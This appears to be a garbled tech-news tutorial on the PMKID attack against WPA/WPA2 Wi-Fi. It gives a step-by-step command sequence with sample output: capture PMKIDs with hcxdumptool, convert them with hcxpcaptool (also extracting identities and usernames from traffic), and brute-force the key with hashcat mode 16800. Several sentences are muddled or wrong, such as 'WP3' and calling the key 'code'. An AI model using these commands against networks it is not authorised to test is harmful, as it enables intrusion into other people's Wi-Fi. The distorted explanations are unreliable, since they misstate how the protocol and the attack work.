The new method for cracking WPA / WPA2 allowed the vulnerability of WiFi networks to pre-shared key-hash attackers using targeted victims ‘ passwords.
This technique was discovered during an attack against the recently released WPA3 security standard which is incredibly difficult to break since its current key setup protocol, the Simultaneous Authentication of Equals (SAE), is used.
Wi-Fi Alliance’s latest WP3 security model provides Wi-Fi protection in the next decade with new capabilities to improve both personal and corporate network and the current WP3 security standard that is a successor to WPA2.
Researcher finds this assault in the absence of EAPOL 4-way handshake that compromises the WPA / WPA2 code.
The new attack on a single EAPOL framework is conducted, as stated by Steube who is the developer of the Hashcat password cracking tool, on the RSN IE (Robust Security Network Information Element).
Further, this attack works Against all forms of 802.11i / p / q / r roaming networks and how many vendors and routers this strategy can run is not clear.
How Does WPA / WPA2 Password Password Work:
Robust Security Network Information Element (RSN IE) Work WPA / WPA2 WiFi Password Attack work in 802.11 management frames and is operated in the same EAPOL frame.
RSN IE can catch Pairwise Master Key ID (PMKID) whenever a user tries to authenticate with the router.
“Here we can see that the PMKID captured is calculated by HMAC-SHA1, with the PMK key and the data part as concatenation of a fixed string label” PMK Name, “MAC address of the point of access, and the station MAC address.”
To use this new attack, you need the following tools:
1. hcxdumptool v4.2.0 or higher
2. hcxtools v4.2.0 or higher
3. hashcat v4.2.0 or higher
Run hcxdumptool to get AP PMKID, and dump the folder with the following code in PCAP format.
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
The output looks like this:
start capturing (stop with ctrl+c)
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
Run the following tool, called hcxpcaptool, to transform recorded data from the pcapng format into hash-coded formats.
$ ./hcxpcaptool -z test.16800 test.pcapng
The content of the written file will look like this and it split into 4 columns.
PMKID * MAC AP * MAC Station * ESSID
Also, Researcher recommends that, While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.
-E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
-I retrieve identities from WiFi-traffic
-U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
Eventually, run hashcat, we need the PMKID-16800 hash mode, and like any other hash form, we can use the following code.
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
Finally, it cracked the hash WPA-PMKID-PBKDF2
When we look at previously available WiFi attacks, we have to sit back and wait until the target user is paired, we can crack the key by catching the four-way handshake.
To have access to the PMKID, this new attack just needs to try to authenticate into the wireless network later on.
However, this approach is much easier to access the hash containing the pre-shared key and the hash later will be broken, which is also little difficult due to the complexity of the code.